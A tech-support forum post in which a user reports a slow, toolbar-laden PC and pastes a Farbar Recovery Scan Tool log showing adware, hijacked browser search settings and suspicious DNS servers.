Solved Will my brother in law ever learn?

glhglh

Lots of slowness and lots of toolbars installed.

FRST 1:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10-02-2017
Ran by Randy (administrator) on HP-RRR (10-02-2017 21:47:09)
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
(Digital Care Solutions) C:\Program Files\BDServices\BitDefenderCOM.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(SlimWare Utilities, Inc.) C:\Program Files\SlimService\SlimServiceFactory.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(SlimWare Utilities, Inc.) C:\Program Files\SlimService\SlimService.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Slimware Utilities Holdings, Inc.) C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AOL Inc.) C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe
(The Chromium Authors) C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
(Adobe Systems Incorporated) C:\Config.Msi\cfaec5f2.rbf
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\Install\{27B1DC9B-40FD-4489-AE63-D0E163D5D7FC}\56.0.2924.87_chrome_installer.exe
(Google Inc.) C:\Windows\Temp\CR_58E4E.tmp\setup.exe
(Google Inc.) C:\Windows\Temp\CR_58E4E.tmp\setup.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Hewlett-Packard Development Company, LP) C:\Program Files\HP\HP OfficeJet 3830 series\Bin\HPNetworkCommunicatorCom.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-01-04] (IDT, Inc.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-01-19] (Atheros Commnucations)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-27] (Synaptics Incorporated)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [576568 2011-11-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\AOLSoftware.exe [41800 2010-03-07] (AOL Inc.)
HKLM-x32\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [913920 2016-01-04] () <===== ATTENTION
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1160408 2016-12-17] (Adobe Systems Incorporated)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [HP OfficeJet 3830 series (NET)] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe [3651080 2015-03-09] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [NowUSeeIt Player] => C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe [913920 2016-01-04] () <===== ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [Chromium] => c:\users\randy\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [SlimCleaner Plus] => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe [26201280 2016-07-25] (Slimware Utilities Holdings, Inc.)
ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll [2016-05-06] (SpeedyPC Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk [2015-12-11]
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\Broderbund\PrintMaster\pmremind.exe (Broderbund Properties LLC)
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled [2016-02-02] ()
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZIP.lnk [2015-12-11]
ShortcutTarget: JZIP.lnk -> C:\Windows\System32\schtasks.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{31ea90e4-35d4-4540-a94c-eab28ac7c7e0}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{3973625b-d550-4482-8626-055c851fa7f8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{825E0274-4ABB-4A35-83B7-62488622A3B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{ed4e3568-60c7-4154-bc8c-83374c0e6f1c}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655671564010&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672036951&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672053665&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {77F8667C-BC7F-4CCB-B5BD-96659BD2F0DE} URL = hxxp://search.aol.com/aol/search?q={searchTerms}&s_it=clireset-ie
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CP6fnartpMoCFc5bfgodIZsNCA&ptb=5EEB6E1C-093A-40CF-A501-0BE772DDE2B1&ind=2016011213&n=7829e3cd&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {1B687A8D-64D5-4CAD-B865-D4512F4B23DD} URL = hxxp://search.aol.com/aol/search?q={searchTerms}&s_it=clireset-ie
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CP6fnartpMoCFc5bfgodIZsNCA&ptb=5EEB6E1C-093A-40CF-A501-0BE772DDE2B1&ind=2016011213&n=7829e3cd&psa=&st=sb&searchfor={searchTerms}
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-01-19] (Atheros Commnucations)
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default [2016-08-08]
FF user.js: detected! => C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\user.js [2016-01-28]
FF Homepage: Mozilla\Firefox\Profiles\w1n6vmjf.default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\w1n6vmjf.default -> Search Provided by Yahoo
FF Keyword.URL: Mozilla\Firefox\Profiles\w1n6vmjf.default -> hxxp://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query=
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\w1n6vmjf.default -> Search Provided by Yahoo
FF NewTab: Mozilla\Firefox\Profiles\w1n6vmjf.default -> about:newtab
FF Extension: (videoresumerjetpack) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\videoresumer@jetpack [2015-12-11] [not signed]
FF Extension: (Yahoo! Toolbar) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [2016-01-04] [not signed]
FF Extension: (AOL Toolbar) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\Extensions\{7affbfae-c4e2-4915-8c0f-00fa3ec610a1} [2016-01-28] [not signed]
FF SearchPlugin: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\aolsearch.xml [2015-12-15]
FF SearchPlugin: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\Search Provided by Yahoo.xml [2016-02-15]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml [2015-12-15]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2011-11-07] (Adobe Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @viewpoint.com/VMP -> C:\Program Files (x86)\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll [2004-02-20] ()
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjninstallplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjninstallplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjnplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjnplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\cfg [2015-12-11] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF4vDPXvI545K5Lk0yZuaPTEZETNhOb%2FBJMlU3cWrtE3B5LPuATRj4TiQDTLE5W%2F6T1gG3gr%2B63Fuf4DJw3bmxC%2BZWeGECWX8xosk8oaYOJhVzfdn7C0MU8tFOhlX0D867I7w%2FY3BPKDl2YWznSMNnMNhdfhuhn%2BhoVJITdlVyN5g%3D
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuFhCJrEQv%2Fc%2BX2qZcHHjPPs%2Bq5PxEnDevcjOXYLyIHaBnM0IoJ8MqMcKnm8tCbPzRbgJMRuO8J430v3e4Ts%2F%2BpSpNuZ2wz8ISRKpXfOt2Mn1ECKZer7C78v27A4TWru%2BOJphUGzd3uNG%2Bbj9taw10baItFUSSmTPZfB91iIJ4NZHs%3D","hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF%2BSx9IQO%2Btq1ES3xDVIbRnGPfSeuBJV3RjakyiaTUMyic9cEOZz%2BIMAEXlTGw29QZ8O%2BMT2WbP3ntbUpNhkYAiDSvZVBLYjw6TmKit75VvKwgkCE5sGqaHpFG3bnw81er2LsvJrXoUWjpc3z21x5IKcuu7XPn1%2FeTgH5tz0ptHRU%3D&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search.yahoo.com
CHR DefaultNewTabURL: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF9CWpdq8%2BWMi2ZHXIPXjQavHclM9j1Ab9UVxxrvumLdV%2BHCMXZufzoRPgqvEu%2BSX%2BVjLy6NdvJS4GO4EhWobrp%2BCPE5Ncg5ey6jMngZaMQCh%2BAmhFzEwpL1%2F33kJ7fiGTyGwEETEUxfbQHs30Lj1Pcjs8sJdvhGspUs%2FhtFiexxQ%3D
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default [2016-08-08]
CHR Extension: (Google Docs) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-30]
CHR Extension: (Google Drive) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-30]
CHR Extension: (YouTube) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-30]
CHR Extension: (Google Docs Offline) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-06]
CHR Extension: (Home Tab) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg [2016-08-06]
